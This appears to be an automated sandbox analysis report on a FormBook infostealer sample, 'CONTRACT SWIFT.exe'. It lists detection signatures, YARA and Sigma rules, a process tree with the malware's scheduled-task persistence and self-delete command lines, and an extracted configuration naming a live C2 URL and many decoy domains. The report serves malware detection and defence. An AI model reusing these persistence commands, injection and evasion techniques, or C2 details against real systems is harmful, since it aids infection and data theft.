Play interactive tour

Edit tour

Analysis Report CONTRACT SWIFT.exe

Overview

General Information

Sample Name:	CONTRACT SWIFT.exe
Analysis ID:	427265
MD5:	db181ebdb6f9f062a64bd94aaf2040c0
SHA1:	0b93b5045f8be50b4d70f0ce3b353d61a3f398d0
SHA256:	7e764e53424c41b68593b184364b18e22eeb77199532e6dd9b7d968cc7f4014d
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Suspicious Process Start Without DLL

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

CONTRACT SWIFT.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\CONTRACT SWIFT.exe' MD5: DB181EBDB6F9F062A64BD94AAF2040C0)

schtasks.exe (PID: 7068 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hiCrWx' /XML 'C:\Users\user\AppData\Local\Temp\tmpF496.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 7136 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

netsh.exe (PID: 6376 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

cmd.exe (PID: 6340 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ursulaaubri.com/s5cm/"], "decoy": ["labibmasas.com", "puppy-os.com", "campingquick.com", "bluewavewelding.com", "qizhukeji.com", "economiemalin.com", "tomrings.com", "mdduct.com", "cloodgame.com", "acadiepresse.com", "daleradio.net", "kampanyalisayfalar.digital", "instrumentsets.com", "centralcoastcardeals.com", "xn--fiqyww2q3xd.xyz", "annafelicia.com", "vinkle.net", "somebodyelsesdesigns.com", "thatsohaute.com", "gaoxiaoduan.com", "dominatedirectsales.com", "lovereeko.com", "gamechangers.ovh", "500truyen.com", "davidekacey.com", "timucinoender7d.net", "lecapafricain.com", "1ghjtt.com", "vrvvrf.com", "perladicalabria.com", "treasureofcl.com", "platitotoronto.com", "weakmayors.com", "xn--49s29unqv0jjwvp.com", "zaseto.com", "doluart.com", "votelaura.info", "mononaoficial.com", "ultimateplumpudding.co.uk", "linjudama.com", "cryptoleadersclub.online", "rnrsans.com", "empiresolardev.com", "ayerconvenience.com", "forthepeopleagain.com", "votehoward.com", "zbssports.com", "atmlfmrs.com", "upanishad.info", "cannaceastore.com", "bioskop378.com", "ecms2019.net", "dfhgear.com", "violetapple.icu", "backyardeventsla.com", "pixelkuss.com", "bisaterbang.com", "invst101.com", "byyourstruly.net", "antiann.com", "cryptocurrency-articles.com", "friendsed.com", "getcoronabusters.com", "paperlessconsulting.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x94648:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x949e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbb868:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbbc02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa06f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xc7915:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa01e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xc7401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa07f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xc7a17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa096f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc7b8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x953fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xbc61a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9f45c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xc667c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x96172:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xbd392:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xa57e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xcca07:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa688a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xa2719:$sqlite3step: 68 34 1C 7B E1 0xa282c:$sqlite3step: 68 34 1C 7B E1 0xc9939:$sqlite3step: 68 34 1C 7B E1 0xc9a4c:$sqlite3step: 68 34 1C 7B E1 0xa2748:$sqlite3text: 68 38 2A 90 C5 0xa286d:$sqlite3text: 68 38 2A 90 C5 0xc9968:$sqlite3text: 68 38 2A 90 C5 0xc9a8d:$sqlite3text: 68 38 2A 90 C5 0xa275b:$sqlite3blob: 68 53 D8 7F 8C 0xa2883:$sqlite3blob: 68 53 D8 7F 8C 0xc997b:$sqlite3blob: 68 53 D8 7F 8C 0xc9aa3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CONTRACT SWIFT.exe PID: 6892	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
5.0.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Start Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\CONTRACT SWIFT.exe' , ParentImage: C:\Users\user\Desktop\CONTRACT SWIFT.exe, ParentProcessId: 6892, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7136

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\CONTRACT SWIFT.exe' , ParentImage: C:\Users\user\Desktop\CONTRACT SWIFT.exe, ParentProcessId: 6892, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7136

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ursulaaubri.com/s5cm/"], "decoy": ["labibmasas.com", "puppy-os.com", "campingquick.com", "bluewavewelding.com", "qizhukeji.com", "economiemalin.com", "tomrings.com", "mdduct.com", "cloodgame.com", "acadiepresse.com", "daleradio.net", "kampanyalisayfalar.digital", "instrumentsets.com", "centralcoastcardeals.com", "xn--fiqyww2q3xd.xyz", "annafelicia.com", "vinkle.net", "somebodyelsesdesigns.com", "thatsohaute.com", "gaoxiaoduan.com", "dominatedirectsales.com", "lovereeko.com", "gamechangers.ovh", "500truyen.com", "davidekacey.com", "timucinoender7d.net", "lecapafricain.com", "1ghjtt.com", "vrvvrf.com", "perladicalabria.com", "treasureofcl.com", "platitotoronto.com", "weakmayors.com", "xn--49s29unqv0jjwvp.com", "zaseto.com", "doluart.com", "votelaura.info", "mononaoficial.com", "ultimateplumpudding.co.uk", "linjudama.com", "cryptoleadersclub.online", "rnrsans.com", "empiresolardev.com", "ayerconvenience.com", "forthepeopleagain.com", "votehoward.com", "zbssports.com", "atmlfmrs.com", "upanishad.info", "cannaceastore.com", "bioskop378.com", "ecms2019.net", "dfhgear.com", "violetapple.icu", "backyardeventsla.com", "pixelkuss.com", "bisaterbang.com", "invst101.com", "byyourstruly.net", "antiann.com", "cryptocurrency-articles.com", "friendsed.com", "getcoronabusters.com", "paperlessconsulting.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\hiCrWx.exe

ReversingLabs: Detection: 67%

Multi AV Scanner detection for submitted file

Show sources

Source: CONTRACT SWIFT.exe	Virustotal: Detection: 51%			Perma Link
Source: CONTRACT SWIFT.exe	ReversingLabs: Detection: 67%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\hiCrWx.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: CONTRACT SWIFT.exe

Joe Sandbox ML: detected

Source: 5.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: CONTRACT SWIFT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: CONTRACT SWIFT.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.354327049.000000000F020000.00000002.00000001.sdmp
Source:	Binary string: netsh.pdb source: RegSvcs.exe, 00000005.00000002.390764175.000000000117A000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb, source: netsh.exe, 0000000A.00000002.586356219.0000000003C87000.00000004.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000005.00000002.390764175.000000000117A000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.390940001.00000000016CF000.00000040.00000001.sdmp, netsh.exe, 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp
